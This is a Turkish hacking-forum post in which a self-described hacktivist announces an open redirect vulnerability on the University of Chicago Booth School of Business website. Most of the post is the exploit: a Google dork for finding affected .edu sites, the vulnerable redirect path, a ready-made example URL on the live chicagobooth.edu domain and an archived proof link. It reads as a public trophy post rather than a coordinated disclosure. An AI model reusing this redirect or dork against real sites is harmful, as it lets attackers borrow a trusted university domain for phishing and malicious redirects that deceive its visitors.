Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: University of Chicago Booth Business Open Redirect Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 30 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6456
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
University of Chicago Booth Business Open Redirect Vuln
20.06.2018 14:29
################################################################################​#################

# Exploit Title : The University of Chicago Booth School of Business Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/06/2018
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]

################################################################################​#################

# Google Dork : inurl:''/assests/redirects/?source='' site:edu

# Exploit : /assests/redirects/?source=sbspli&rd=http://www.ANYDOMAINADDRESSHERE.gov

# Note : All Domain Extension is acceptable. For example => .com .net .org .int .mil etcetra....

################################################################################​#################

# Example Sites : chicagobooth.edu/assests/redirects/?source=sbspli&rd=http://www.ANYDOMAINADDRESSHERE.gov

Proof of Concept => archive.is/88w6j

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi